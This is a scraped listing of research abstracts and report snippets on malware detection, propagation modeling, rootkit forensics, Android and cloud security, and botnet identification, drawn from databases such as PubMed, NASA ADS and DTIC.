Malware are analogs of viruses. Viruses are comprised of large numbers of polypeptide proteins. The shape and function of the protein strands determines the functionality of the segment, similar to a subroutine in malware. The full combination of subroutines is the malware organism, in analogous fashion as a collection of polypeptides forms protein structures that are information bearing. We propose to apply the methods of Bioinformatics to analyze malware to provide a rich feature set for creating a unique and novel detection and classification scheme that is originally applied to Bioinformatics amino acid sequencing. Our proposed methods enable real time in situ (in contrast to in vivo) detection applications.

Monitoring Malware Activity on the LAN Network

NASA Astrophysics Data System (ADS)

Skrzewski, Mirosław

Many security related organizations periodically publish current network and systems security information, with the lists of top malware programs. These lists raises the question how these threats spreads out, if the worms (the only threat with own communication abilities) are low or missing on these lists. The paper discuss the research on malware network activity, aimed to deliver the answer to the question, what is the main infection channel of modern malware, done with the usage of virtual honeypot systems on dedicated, unprotected network. Systems setup, network and systems monitoring solutions, results of over three months of network traffic and malware monitoring are presented, along with the proposed answer to our research question.

Software Authority Transition through Multiple Distributors

PubMed Central

Han, Kyusunk; Shon, Taeshik

2014-01-01

The rapid growth in the use of smartphones and tablets has changed the software distribution ecosystem. The trend today is to purchase software through application stores rather than from traditional offline markets. Smartphone and tablet users can install applications easily by purchasing from the online store deployed in their device. Several systems, such as Android or PC-based OS units, allow users to install software from multiple sources. Such openness, however, can promote serious threats, including malware and illegal usage. In order to prevent such threats, several stores use online authentication techniques. These methods can, however, also present a problem whereby even licensed users cannot use their purchased application. In this paper, we discuss these issues and provide an authentication method that will make purchased applications available to the registered user at all times. PMID:25143971

Software authority transition through multiple distributors.

PubMed

Han, Kyusunk; Shon, Taeshik

2014-01-01

The rapid growth in the use of smartphones and tablets has changed the software distribution ecosystem. The trend today is to purchase software through application stores rather than from traditional offline markets. Smartphone and tablet users can install applications easily by purchasing from the online store deployed in their device. Several systems, such as Android or PC-based OS units, allow users to install software from multiple sources. Such openness, however, can promote serious threats, including malware and illegal usage. In order to prevent such threats, several stores use online authentication techniques. These methods can, however, also present a problem whereby even licensed users cannot use their purchased application. In this paper, we discuss these issues and provide an authentication method that will make purchased applications available to the registered user at all times.

Malware Analysis Using Visualized Image Matrices

PubMed Central

Im, Eul Gyu

2014-01-01

This paper proposes a novel malware visual analysis method that contains not only a visualization method to convert binary files into images, but also a similarity calculation method between these images. The proposed method generates RGB-colored pixels on image matrices using the opcode sequences extracted from malware samples and calculates the similarities for the image matrices. Particularly, our proposed methods are available for packed malware samples by applying them to the execution traces extracted through dynamic analysis. When the images are generated, we can reduce the overheads by extracting the opcode sequences only from the blocks that include the instructions related to staple behaviors such as functions and application programming interface (API) calls. In addition, we propose a technique that generates a representative image for each malware family in order to reduce the number of comparisons for the classification of unknown samples and the colored pixel information in the image matrices is used to calculate the similarities between the images. Our experimental results show that the image matrices of malware can effectively be used to classify malware families both statically and dynamically with accuracy of 0.9896 and 0.9732, respectively. PMID:25133202

Go Ahead of Malware’s Infections and Controls: Towards New Techniques for Proactive Cyber Defense

DTIC Science & Technology

2016-12-08

in SDN (such as topology poisoning attacks and data-to-control plan saturation attacks) and developed new defense for SDN (such as TopoGuard and... Poisoning Network Visibility in Software-Defined Networks: New Attacks and Countermeasures As part of our research on discovering new vulnerabilities...future network- ing paradigm. We demonstrate that this new attacks can effectively poison the network topology information, then further successfully

Covert Android Rootkit Detection: Evaluating Linux Kernel Level Rootkits on the Android Operating System

DTIC Science & Technology

2012-06-14

the attacker . Thus, this race condition causes a privilege escalation . 2.2.5 Summary This section reviewed software exploitation of a Linux kernel...has led to increased targeting by malware writers. Android attacks have naturally sparked interest in researching protections for Android . This...release, Android 4.0 Ice Cream Sandwich. These rootkits focused on covert techniques to hide the presence of data used by an attacker to infect a

Dynamic malware analysis using IntroVirt: a modified hypervisor-based system

NASA Astrophysics Data System (ADS)

White, Joshua S.; Pape, Stephen R.; Meily, Adam T.; Gloo, Richard M.

2013-05-01

In this paper, we present a system for Dynamic Malware Analysis which incorporates the use of IntroVirt™. IntroVirt is an introspective hypervisor architecture and infrastructure that supports advanced analysis techniques for stealth-malwareanalysis. This system allows for complete guest monitoring and interaction, including the manipulation and blocking of system calls. IntroVirt is capable of bypassing virtual machine detection capabilities of even the most sophisticated malware, by spoofing returns to system call responses. Additional fuzzing capabilities can be employed to detect both malware vulnerabilities and polymorphism.

An Android malware detection system based on machine learning

NASA Astrophysics Data System (ADS)

Wen, Long; Yu, Haiyang

2017-08-01

The Android smartphone, with its open source character and excellent performance, has attracted many users. However, the convenience of the Android platform also has motivated the development of malware. The traditional method which detects the malware based on the signature is unable to detect unknown applications. The article proposes a machine learning-based lightweight system that is capable of identifying malware on Android devices. In this system we extract features based on the static analysis and the dynamitic analysis, then a new feature selection approach based on principle component analysis (PCA) and relief are presented in the article to decrease the dimensions of the features. After that, a model will be constructed with support vector machine (SVM) for classification. Experimental results show that our system provides an effective method in Android malware detection.

Securing mobile code.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Link, Hamilton E.; Schroeppel, Richard Crabtree; Neumann, William Douglas

2004-10-01

If software is designed so that the software can issue functions that will move that software from one computing platform to another, then the software is said to be 'mobile'. There are two general areas of security problems associated with mobile code. The 'secure host' problem involves protecting the host from malicious mobile code. The 'secure mobile code' problem, on the other hand, involves protecting the code from malicious hosts. This report focuses on the latter problem. We have found three distinct camps of opinions regarding how to secure mobile code. There are those who believe special distributed hardware ismore » necessary, those who believe special distributed software is necessary, and those who believe neither is necessary. We examine all three camps, with a focus on the third. In the distributed software camp we examine some commonly proposed techniques including Java, D'Agents and Flask. For the specialized hardware camp, we propose a cryptographic technique for 'tamper-proofing' code over a large portion of the software/hardware life cycle by careful modification of current architectures. This method culminates by decrypting/authenticating each instruction within a physically protected CPU, thereby protecting against subversion by malicious code. Our main focus is on the camp that believes that neither specialized software nor hardware is necessary. We concentrate on methods of code obfuscation to render an entire program or a data segment on which a program depends incomprehensible. The hope is to prevent or at least slow down reverse engineering efforts and to prevent goal-oriented attacks on the software and execution. The field of obfuscation is still in a state of development with the central problem being the lack of a basis for evaluating the protection schemes. We give a brief introduction to some of the main ideas in the field, followed by an in depth analysis of a technique called 'white-boxing'. We put forth some new attacks and improvements on this method as well as demonstrating its implementation for various algorithms. We also examine cryptographic techniques to achieve obfuscation including encrypted functions and offer a new application to digital signature algorithms. To better understand the lack of security proofs for obfuscation techniques, we examine in detail general theoretical models of obfuscation. We explain the need for formal models in order to obtain provable security and the progress made in this direction thus far. Finally we tackle the problem of verifying remote execution. We introduce some methods of verifying remote exponentiation computations and some insight into generic computation checking.« less

Malware Memory Analysis of the IVYL Linux Rootkit: Investigating a Publicly Available Linux Rootkit Using the Volatility Memory Analysis Framework

DTIC Science & Technology

2015-04-01

report is to examine how a computer forensic investigator/incident handler, without specialised computer memory or software reverse engineering skills ...The skills amassed by incident handlers and investigators alike while using Volatility to examine Windows memory images will be of some help...bin/pulseaudio --start --log-target=syslog 1362 1000 1000 nautilus 1366 1000 1000 /usr/lib/pulseaudio/pulse/gconf- helper 1370 1000 1000 nm-applet

Cloud Security: Issues and Research Directions

DTIC Science & Technology

2014-11-18

4. Cloud Computing Security: What Changes with Software - Defined Networking ? Maur´ıcio Tsugawa, Andr´ea Matsunaga, and Jos´e A. B. Fortes 5...machine’s memory from an untrusted or malicious hypervisor. In Chapter 4, Tsugawa et al. discuss the security issues introduced when Software - Defined ... Networking ( SDN ) is deployed within and across clouds. Chapters 5-9 are focused on the protection of data stored in the cloud. In Chapter 5, Wang et

a Discrete Mathematical Model to Simulate Malware Spreading

NASA Astrophysics Data System (ADS)

Del Rey, A. Martin; Sánchez, G. Rodriguez

2012-10-01

With the advent and worldwide development of Internet, the study and control of malware spreading has become very important. In this sense, some mathematical models to simulate malware propagation have been proposed in the scientific literature, and usually they are based on differential equations exploiting the similarities with mathematical epidemiology. The great majority of these models study the behavior of a particular type of malware called computer worms; indeed, to the best of our knowledge, no model has been proposed to simulate the spreading of a computer virus (the traditional type of malware which differs from computer worms in several aspects). In this sense, the purpose of this work is to introduce a new mathematical model not based on continuous mathematics tools but on discrete ones, to analyze and study the epidemic behavior of computer virus. Specifically, cellular automata are used in order to design such model.

Intrusion-Tolerant Replication under Attack

ERIC Educational Resources Information Center

Kirsch, Jonathan

2010-01-01

Much of our critical infrastructure is controlled by large software systems whose participants are distributed across the Internet. As our dependence on these critical systems continues to grow, it becomes increasingly important that they meet strict availability and performance requirements, even in the face of malicious attacks, including those…

Information hiding techniques for infrared images: exploring the state-of-the art and challenges

NASA Astrophysics Data System (ADS)

Pomponiu, Victor; Cavagnino, Davide; Botta, Marco; Nejati, Hossein

2015-10-01

The proliferation of Infrared technology and imaging systems enables a different perspective to tackle many computer vision problems in defense and security applications. Infrared images are widely used by the law enforcement, Homeland Security and military organizations to achieve a significant advantage or situational awareness, and thus is vital to protect these data against malicious attacks. Concurrently, sophisticated malware are developed which are able to disrupt the security and integrity of these digital media. For instance, illegal distribution and manipulation are possible malicious attacks to the digital objects. In this paper we explore the use of a new layer of defense for the integrity of the infrared images through the aid of information hiding techniques such as watermarking. In this context, we analyze the efficiency of several optimal decoding schemes for the watermark inserted into the Singular Value Decomposition (SVD) domain of the IR images using an additive spread spectrum (SS) embedding framework. In order to use the singular values (SVs) of the IR images with the SS embedding we adopt several restrictions that ensure that the values of the SVs will maintain their statistics. For both the optimal maximum likelihood decoder and sub-optimal decoders we assume that the PDF of SVs can be modeled by the Weibull distribution. Furthermore, we investigate the challenges involved in protecting and assuring the integrity of IR images such as data complexity and the error probability behavior, i.e., the probability of detection and the probability of false detection, for the applied optimal decoders. By taking into account the efficiency and the necessary auxiliary information for decoding the watermark, we discuss the suitable decoder for various operating situations. Experimental results are carried out on a large dataset of IR images to show the imperceptibility and efficiency of the proposed scheme against various attack scenarios.

Graphs for information security control in software defined networks

NASA Astrophysics Data System (ADS)

Grusho, Alexander A.; Abaev, Pavel O.; Shorgin, Sergey Ya.; Timonina, Elena E.

2017-07-01

Information security control in software defined networks (SDN) is connected with execution of the security policy rules regulating information accesses and protection against distribution of the malicious code and harmful influences. The paper offers a representation of a security policy in the form of hierarchical structure which in case of distribution of resources for the solution of tasks defines graphs of admissible interactions in a networks. These graphs define commutation tables of switches via the SDN controller.

Dynamic malware containment under an epidemic model with alert

NASA Astrophysics Data System (ADS)

Zhang, Tianrui; Yang, Lu-Xing; Yang, Xiaofan; Wu, Yingbo; Tang, Yuan Yan

2017-03-01

Alerting at the early stage of malware invasion turns out to be an important complement to malware detection and elimination. This paper addresses the issue of how to dynamically contain the prevalence of malware at a lower cost, provided alerting is feasible. A controlled epidemic model with alert is established, and an optimal control problem based on the epidemic model is formulated. The optimality system for the optimal control problem is derived. The structure of an optimal control for the proposed optimal control problem is characterized under some conditions. Numerical examples show that the cost-efficiency of an optimal control strategy can be enhanced by adjusting the upper and lower bounds on admissible controls.

Android malware detection based on evolutionary super-network

NASA Astrophysics Data System (ADS)

Yan, Haisheng; Peng, Lingling

2018-04-01

In the paper, an android malware detection method based on evolutionary super-network is proposed in order to improve the precision of android malware detection. Chi square statistics method is used for selecting characteristics on the basis of analyzing android authority. Boolean weighting is utilized for calculating characteristic weight. Processed characteristic vector is regarded as the system training set and test set; hyper edge alternative strategy is used for training super-network classification model, thereby classifying test set characteristic vectors, and it is compared with traditional classification algorithm. The results show that the detection method proposed in the paper is close to or better than traditional classification algorithm. The proposed method belongs to an effective Android malware detection means.

Modeling malware propagation using a carrier compartment

NASA Astrophysics Data System (ADS)

Hernández Guillén, J. D.; Martín del Rey, A.

2018-03-01

The great majority of mathematical models proposed to simulate malware spreading are based on systems of ordinary differential equations. These are compartmental models where the devices are classified according to some types: susceptible, exposed, infectious, recovered, etc. As far as we know, there is not any model considering the special class of carrier devices. This type is constituted by the devices whose operative systems is not targeted by the malware (for example, iOS devices for Android malware). In this work a novel mathematical model considering this new compartment is considered. Its qualitative study is presented and a detailed analysis of the efficient control measures is shown by studying the basic reproductive number.

Risk Metrics for Android (trademark) Devices

DTIC Science & Technology

2017-02-01

allows for easy distribution of malware. This report surveys malware distribution methodologies , then describes current work being done to determine the...given a standard weight of wi = 1. Two data sets were used for testing this methodology . Because the authors are Chinese, they chose to download apps...Order Analysis excels at handling non -obfuscated apps, but may not be able to detect malware that employs encryption or dynamically changes its payload

Detection Of Malware Collusion With Static Dependence Analysis On Inter-App Communication

DTIC Science & Technology

2016-12-08

DETECTION OF MALWARE COLLUSION WITH STATIC DEPENDENCE ANALYSIS ON INTER-APP COMMUNICATION VIRGINIA TECH DECEMBER 2016 FINAL TECHNICAL REPORT... DEPENDENCE ANALYSIS ON INTER-APP COMMUNICATION 5a. CONTRACT NUMBER FA8750-15-2-0076 5b. GRANT NUMBER N/A 5c. PROGRAM ELEMENT NUMBER 61101E 6. AUTHOR(S...exploited. 15. SUBJECT TERMS Malware Collusion; Inter-App Communication; Static Dependence Analysis 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF

An epidemiological model of internet worms with hierarchical dispersal and spatial clustering of hosts.

PubMed

Hiebeler, David E; Audibert, Andrew; Strubell, Emma; Michaud, Isaac J

2017-04-07

Beginning in 2001, many instances of malicious software known as Internet worms have been using biological strategies such as hierarchical dispersal to seek out and spread to new susceptible hosts more efficiently. We measured the distribution of potentially susceptible hosts in the space of Internet addresses to determine their clustering. We have used the results to construct a full-size simulated Internet with 2 32 hosts with mean and variance of susceptible hosts chosen to match our measurements at multiple spatial scales. Epidemiological simulations of outbreaks among the roughly 2.8×10 6 susceptible hosts on this full-sized network show that local preference scanning greatly increases the chances for an infected host to locate and infect other susceptible hosts by a factor of as much as several hundred. However, once deploying this strategy, the overall success of a worm is relatively insensitive to the details of its dispersal strategy over a wide range of parameters. In addition, although using localized interactions may allow malicious software to spread more rapidly or to more hosts on average, it can also lead to increased variability in infection levels among replicate simulations. Using such dispersal strategies may therefore be a high risk, high reward strategy for the authors of such software. Copyright © 2017 Elsevier Ltd. All rights reserved.

Hybrid methods for cybersecurity analysis :

DOE Office of Scientific and Technical Information (OSTI.GOV)

Davis, Warren Leon,; Dunlavy, Daniel M.

2014-01-01

Early 2010 saw a signi cant change in adversarial techniques aimed at network intrusion: a shift from malware delivered via email attachments toward the use of hidden, embedded hyperlinks to initiate sequences of downloads and interactions with web sites and network servers containing malicious software. Enterprise security groups were well poised and experienced in defending the former attacks, but the new types of attacks were larger in number, more challenging to detect, dynamic in nature, and required the development of new technologies and analytic capabilities. The Hybrid LDRD project was aimed at delivering new capabilities in large-scale data modeling andmore » analysis to enterprise security operators and analysts and understanding the challenges of detection and prevention of emerging cybersecurity threats. Leveraging previous LDRD research e orts and capabilities in large-scale relational data analysis, large-scale discrete data analysis and visualization, and streaming data analysis, new modeling and analysis capabilities were quickly brought to bear on the problems in email phishing and spear phishing attacks in the Sandia enterprise security operational groups at the onset of the Hybrid project. As part of this project, a software development and deployment framework was created within the security analyst work ow tool sets to facilitate the delivery and testing of new capabilities as they became available, and machine learning algorithms were developed to address the challenge of dynamic threats. Furthermore, researchers from the Hybrid project were embedded in the security analyst groups for almost a full year, engaged in daily operational activities and routines, creating an atmosphere of trust and collaboration between the researchers and security personnel. The Hybrid project has altered the way that research ideas can be incorporated into the production environments of Sandias enterprise security groups, reducing time to deployment from months and years to hours and days for the application of new modeling and analysis capabilities to emerging threats. The development and deployment framework has been generalized into the Hybrid Framework and incor- porated into several LDRD, WFO, and DOE/CSL projects and proposals. And most importantly, the Hybrid project has provided Sandia security analysts with new, scalable, extensible analytic capabilities that have resulted in alerts not detectable using their previous work ow tool sets.« less

3 CFR 8427 - Proclamation 8427 of October 1, 2009. National Cybersecurity Awareness Month, 2009

Code of Federal Regulations, 2010 CFR

2010-01-01

... solutions at work and at home. Our Nation’s growing dependence on cyber and information-related technologies, coupled with an increasing threat of malicious cyber attacks and loss of privacy, has given rise to the... digital infrastructures. Cyber attacks and their viral ability to infect networks, devices, and software...

Cyber Ricochet: Risk Management and Cyberspace Operations

DTIC Science & Technology

2012-07-01

Cox, U.S. Cyber Command Director of Intelligence Introduction Recent media reports of the ‘ Duqu ’, ‘Flame’, and ‘Stuxnet’ malware highlight...as the ‘ Duqu ,’ ‘Flame,’ and ‘Stuxnet’ malware, are just of a few of the capabilities that can contribute to mission success and achieve strategic...rely on artificially intelligent agents to dredge up the deepest secrets.” 19 The ‘ Duqu ’ and ‘Flame’ malware are excellent examples of computer

Modeling and analyzing malware propagation in social networks with heterogeneous infection rates

NASA Astrophysics Data System (ADS)

Jia, Peng; Liu, Jiayong; Fang, Yong; Liu, Liang; Liu, Luping

2018-10-01

With the rapid development of social networks, hackers begin to try to spread malware more widely by utilizing various kinds of social networks. Thus, studying malware epidemic dynamics in these networks is becoming a popular subject in the literature. Most of the previous works focus on the effects of factors, such as network topology and user behavior, on malware propagation. Some researchers try to analyze the heterogeneity of infection rates, but the common problem of their works is the factors they mentioned that could affect the heterogeneity are not comprehensive enough. In this paper, focusing on the effects of heterogeneous infection rates, we propose a novel model called HSID (heterogeneous-susceptible-infectious-dormant model) to characterize virus propagation in social networks, in which a connection factor is presented to evaluate the heterogeneous relationships between nodes, and a resistance factor is introduced to represent node's mutable resistant ability. We analyzed how key parameters in the two factors affect the heterogeneity and then performed simulations to explore the effects in three real-world social networks. The results indicate: heterogeneous relationship could lead to wider diffusion in directed network, and heterogeneous security awareness could lead to wider diffusion in both directed and undirected networks; heterogeneous relationship could restrain the outbreak of malware but heterogeneous initial security awareness would increase the probability; furthermore, the increasing resistibility along with infected times would lead to malware's disappearance in social networks.

An analysis of security system for intrusion in Smartphone environment.

PubMed

Louk, Maya; Lim, Hyotaek; Lee, HoonJae

2014-01-01

There are many malware applications in Smartphone. Smartphone's users may become unaware if their data has been recorded and stolen by intruders via malware. Smartphone--whether for business or personal use--may not be protected from malwares. Thus, monitoring, detecting, tracking, and notification (MDTN) have become the main purpose of the writing of this paper. MDTN is meant to enable Smartphone to prevent and reduce the number of cybercrimes. The methods are shown to be effective in protecting Smartphone and isolating malware and sending warning in the form of notification to the user about the danger in progress. In particular, (a) MDTN process is possible and will be enabled for Smartphone environment. (b) The methods are shown to be an advanced security for private sensitive data of the Smartphone user.

An Analysis of Security System for Intrusion in Smartphone Environment

PubMed Central

Louk, Maya; Lim, Hyotaek; Lee, HoonJae

2014-01-01

There are many malware applications in Smartphone. Smartphone's users may become unaware if their data has been recorded and stolen by intruders via malware. Smartphone—whether for business or personal use—may not be protected from malwares. Thus, monitoring, detecting, tracking, and notification (MDTN) have become the main purpose of the writing of this paper. MDTN is meant to enable Smartphone to prevent and reduce the number of cybercrimes. The methods are shown to be effective in protecting Smartphone and isolating malware and sending warning in the form of notification to the user about the danger in progress. In particular, (a) MDTN process is possible and will be enabled for Smartphone environment. (b) The methods are shown to be an advanced security for private sensitive data of the Smartphone user. PMID:25165754

From measurements to metrics: PCA-based indicators of cyber anomaly

NASA Astrophysics Data System (ADS)

Ahmed, Farid; Johnson, Tommy; Tsui, Sonia

2012-06-01

We present a framework of the application of Principal Component Analysis (PCA) to automatically obtain meaningful metrics from intrusion detection measurements. In particular, we report the progress made in applying PCA to analyze the behavioral measurements of malware and provide some preliminary results in selecting dominant attributes from an arbitrary number of malware attributes. The results will be useful in formulating an optimal detection threshold in the principal component space, which can both validate and augment existing malware classifiers.

Digital microarray analysis for digital artifact genomics

NASA Astrophysics Data System (ADS)

Jaenisch, Holger; Handley, James; Williams, Deborah

2013-06-01

We implement a Spatial Voting (SV) based analogy of microarray analysis for digital gene marker identification in malware code sections. We examine a famous set of malware formally analyzed by Mandiant and code named Advanced Persistent Threat (APT1). APT1 is a Chinese organization formed with specific intent to infiltrate and exploit US resources. Manidant provided a detailed behavior and sting analysis report for the 288 malware samples available. We performed an independent analysis using a new alternative to the traditional dynamic analysis and static analysis we call Spatial Analysis (SA). We perform unsupervised SA on the APT1 originating malware code sections and report our findings. We also show the results of SA performed on some members of the families associated by Manidant. We conclude that SV based SA is a practical fast alternative to dynamics analysis and static analysis.

Medical systems and malware.

PubMed

Kusche, Kristopher P

2004-01-01

No longer just an information technology issue, network security requires a multifaceted, multidisciplinary approach to ensuring critical equipment functionality, data security, and patient safety. This article provides insight into the threat of malware and ways to deal with it.

Modeling Passive Propagation of Malwares on the WWW

NASA Astrophysics Data System (ADS)

Chunbo, Liu; Chunfu, Jia

Web-based malwares host in websites fixedly and download onto user's computers automatically while users browse. This passive propagation pattern is different from that of traditional viruses and worms. A propagation model based on reverse web graph is proposed. In this model, propagation of malwares is analyzed by means of random jump matrix which combines orderness and randomness of user browsing behaviors. Explanatory experiments, which has single or multiple propagation sources respectively, prove the validity of the model. Using this model, people can evaluate the hazardness of specified websites and take corresponding countermeasures.

SmartMal: a service-oriented behavioral malware detection framework for mobile devices.

PubMed

Wang, Chao; Wu, Zhizhong; Li, Xi; Zhou, Xuehai; Wang, Aili; Hung, Patrick C K

2014-01-01

This paper presents SmartMal--a novel service-oriented behavioral malware detection framework for vehicular and mobile devices. The highlight of SmartMal is to introduce service-oriented architecture (SOA) concepts and behavior analysis into the malware detection paradigms. The proposed framework relies on client-server architecture, the client continuously extracts various features and transfers them to the server, and the server's main task is to detect anomalies using state-of-art detection algorithms. Multiple distributed servers simultaneously analyze the feature vector using various detectors and information fusion is used to concatenate the results of detectors. We also propose a cycle-based statistical approach for mobile device anomaly detection. We accomplish this by analyzing the users' regular usage patterns. Empirical results suggest that the proposed framework and novel anomaly detection algorithm are highly effective in detecting malware on Android devices.

SmartMal: A Service-Oriented Behavioral Malware Detection Framework for Mobile Devices

PubMed Central

Wu, Zhizhong; Li, Xi; Zhou, Xuehai; Wang, Aili; Hung, Patrick C. K.

2014-01-01

This paper presents SmartMal—a novel service-oriented behavioral malware detection framework for vehicular and mobile devices. The highlight of SmartMal is to introduce service-oriented architecture (SOA) concepts and behavior analysis into the malware detection paradigms. The proposed framework relies on client-server architecture, the client continuously extracts various features and transfers them to the server, and the server's main task is to detect anomalies using state-of-art detection algorithms. Multiple distributed servers simultaneously analyze the feature vector using various detectors and information fusion is used to concatenate the results of detectors. We also propose a cycle-based statistical approach for mobile device anomaly detection. We accomplish this by analyzing the users' regular usage patterns. Empirical results suggest that the proposed framework and novel anomaly detection algorithm are highly effective in detecting malware on Android devices. PMID:25165729

A Study of Covert Communications in Space Platforms Hosting Government Payloads

DTIC Science & Technology

2015-02-01

possible adversarial actions (e.g., malicious software co- resident on the commercial host). Threats to the commercial supply chain are just one... supply chain to either create or exploit channel vulnerabilities. For government hosted payload missions, the critical payload data are encrypted...access to space by hosting government- supplied payloads on commercial space platforms. These commercially hosted payloads require stringent

Debugging classification and anti-debugging strategies

NASA Astrophysics Data System (ADS)

Gao, Shang; Lin, Qian; Xia, Mingyuan; Yu, Miao; Qi, Zhengwei; Guan, Haibing

2011-12-01

Debugging, albeit useful for software development, is also a double-edge sword since it could also be exploited by malicious attackers. This paper analyzes the prevailing debuggers and classifies them into 4 categories based on the debugging mechanism. Furthermore, as an opposite, we list 13 typical anti-debugging strategies adopted in Windows. These methods intercept specific execution points which expose the diagnostic behavior of debuggers.

Root Exploit Detection and Features Optimization: Mobile Device and Blockchain Based Medical Data Management.

PubMed

Firdaus, Ahmad; Anuar, Nor Badrul; Razak, Mohd Faizal Ab; Hashem, Ibrahim Abaker Targio; Bachok, Syafiq; Sangaiah, Arun Kumar

2018-05-04

The increasing demand for Android mobile devices and blockchain has motivated malware creators to develop mobile malware to compromise the blockchain. Although the blockchain is secure, attackers have managed to gain access into the blockchain as legal users, thereby comprising important and crucial information. Examples of mobile malware include root exploit, botnets, and Trojans and root exploit is one of the most dangerous malware. It compromises the operating system kernel in order to gain root privileges which are then used by attackers to bypass the security mechanisms, to gain complete control of the operating system, to install other possible types of malware to the devices, and finally, to steal victims' private keys linked to the blockchain. For the purpose of maximizing the security of the blockchain-based medical data management (BMDM), it is crucial to investigate the novel features and approaches contained in root exploit malware. This study proposes to use the bio-inspired method of practical swarm optimization (PSO) which automatically select the exclusive features that contain the novel android debug bridge (ADB). This study also adopts boosting (adaboost, realadaboost, logitboost, and multiboost) to enhance the machine learning prediction that detects unknown root exploit, and scrutinized three categories of features including (1) system command, (2) directory path and (3) code-based. The evaluation gathered from this study suggests a marked accuracy value of 93% with Logitboost in the simulation. Logitboost also helped to predicted all the root exploit samples in our developed system, the root exploit detection system (RODS).

Information Assurance for Network-Centric Naval Forces

DTIC Science & Technology

2010-01-01

of engineers are designing , implementing, and vigorously testing malicious codes prior to releasing them, not unlike well-funded commercial software...the likelihood that threats would partially succeed and partially degrade the system. Individual components of Aegis are designed and tested with a...of operations (CONOPS) set that is designed to work well in a low-bandwidth environment must be extensively tested and exercised within that low

Insider Threats in the Software Development Lifecycle

DTIC Science & Technology

2014-11-05

employee, contractor, or other business partner who • has or had authorized access to an organization’s network , system or data and • intentionally...organization’s network , system, or data and who, through • their action/inaction without malicious intent • cause harm or substantially increase...and female Male Target Network , systems, or data PII or Customer Information IP (trade secrets) or Customer Information Access Used

Risk Factors for Social Networking Site Scam Victimization Among Malaysian Students.

PubMed

Kirwan, Gráinne H; Fullwood, Chris; Rooney, Brendan

2018-02-01

Social networking sites (SNSs) can provide cybercriminals with various opportunities, including gathering of user data and login credentials to enable fraud, and directing of users toward online locations that may install malware onto their devices. The techniques employed by such cybercriminals can include clickbait (text or video), advertisement of nonexistent but potentially desirable products, and hoax competitions/giveaways. This study aimed to identify risk factors associated with falling victim to these malicious techniques. An online survey was completed by 295 Malaysian undergraduate students, finding that more than one-third had fallen victim to SNS scams. Logistic regression analysis identified several victimization risk factors including having higher scores in impulsivity (specifically cognitive complexity), using fewer devices for SNSs, and having been on an SNS for a longer duration. No reliable model was found for vulnerability to hoax valuable gift giveaways and "friend view application" advertising specifically, but vulnerability to video clickbait was predicted by lower extraversion scores, higher levels of openness to experience, using fewer devices, and being on an SNS for a longer duration. Other personality traits were not associated with either overall victimization susceptibility or increased risk of falling victim to the specific techniques. However, age approached significance within both the video clickbait and overall victimization models. These findings suggest that routine activity theory may be particularly beneficial in understanding and preventing SNSs scam victimization.

Unsupervised, low latency anomaly detection of algorithmically generated domain names by generative probabilistic modeling.

PubMed

Raghuram, Jayaram; Miller, David J; Kesidis, George

2014-07-01

We propose a method for detecting anomalous domain names, with focus on algorithmically generated domain names which are frequently associated with malicious activities such as fast flux service networks, particularly for bot networks (or botnets), malware, and phishing. Our method is based on learning a (null hypothesis) probability model based on a large set of domain names that have been white listed by some reliable authority. Since these names are mostly assigned by humans, they are pronounceable, and tend to have a distribution of characters, words, word lengths, and number of words that are typical of some language (mostly English), and often consist of words drawn from a known lexicon. On the other hand, in the present day scenario, algorithmically generated domain names typically have distributions that are quite different from that of human-created domain names. We propose a fully generative model for the probability distribution of benign (white listed) domain names which can be used in an anomaly detection setting for identifying putative algorithmically generated domain names. Unlike other methods, our approach can make detections without considering any additional (latency producing) information sources, often used to detect fast flux activity. Experiments on a publicly available, large data set of domain names associated with fast flux service networks show encouraging results, relative to several baseline methods, with higher detection rates and low false positive rates.

Unsupervised, low latency anomaly detection of algorithmically generated domain names by generative probabilistic modeling

PubMed Central

Raghuram, Jayaram; Miller, David J.; Kesidis, George

2014-01-01

We propose a method for detecting anomalous domain names, with focus on algorithmically generated domain names which are frequently associated with malicious activities such as fast flux service networks, particularly for bot networks (or botnets), malware, and phishing. Our method is based on learning a (null hypothesis) probability model based on a large set of domain names that have been white listed by some reliable authority. Since these names are mostly assigned by humans, they are pronounceable, and tend to have a distribution of characters, words, word lengths, and number of words that are typical of some language (mostly English), and often consist of words drawn from a known lexicon. On the other hand, in the present day scenario, algorithmically generated domain names typically have distributions that are quite different from that of human-created domain names. We propose a fully generative model for the probability distribution of benign (white listed) domain names which can be used in an anomaly detection setting for identifying putative algorithmically generated domain names. Unlike other methods, our approach can make detections without considering any additional (latency producing) information sources, often used to detect fast flux activity. Experiments on a publicly available, large data set of domain names associated with fast flux service networks show encouraging results, relative to several baseline methods, with higher detection rates and low false positive rates. PMID:25685511

SMARTbot: A Behavioral Analysis Framework Augmented with Machine Learning to Identify Mobile Botnet Applications

PubMed Central

Karim, Ahmad; Salleh, Rosli; Khan, Muhammad Khurram

2016-01-01

Botnet phenomenon in smartphones is evolving with the proliferation in mobile phone technologies after leaving imperative impact on personal computers. It refers to the network of computers, laptops, mobile devices or tablets which is remotely controlled by the cybercriminals to initiate various distributed coordinated attacks including spam emails, ad-click fraud, Bitcoin mining, Distributed Denial of Service (DDoS), disseminating other malwares and much more. Likewise traditional PC based botnet, Mobile botnets have the same operational impact except the target audience is particular to smartphone users. Therefore, it is import to uncover this security issue prior to its widespread adaptation. We propose SMARTbot, a novel dynamic analysis framework augmented with machine learning techniques to automatically detect botnet binaries from malicious corpus. SMARTbot is a component based off-device behavioral analysis framework which can generate mobile botnet learning model by inducing Artificial Neural Networks’ back-propagation method. Moreover, this framework can detect mobile botnet binaries with remarkable accuracy even in case of obfuscated program code. The results conclude that, a classifier model based on simple logistic regression outperform other machine learning classifier for botnet apps’ detection, i.e 99.49% accuracy is achieved. Further, from manual inspection of botnet dataset we have extracted interesting trends in those applications. As an outcome of this research, a mobile botnet dataset is devised which will become the benchmark for future studies. PMID:26978523

SMARTbot: A Behavioral Analysis Framework Augmented with Machine Learning to Identify Mobile Botnet Applications.

PubMed

Karim, Ahmad; Salleh, Rosli; Khan, Muhammad Khurram

2016-01-01

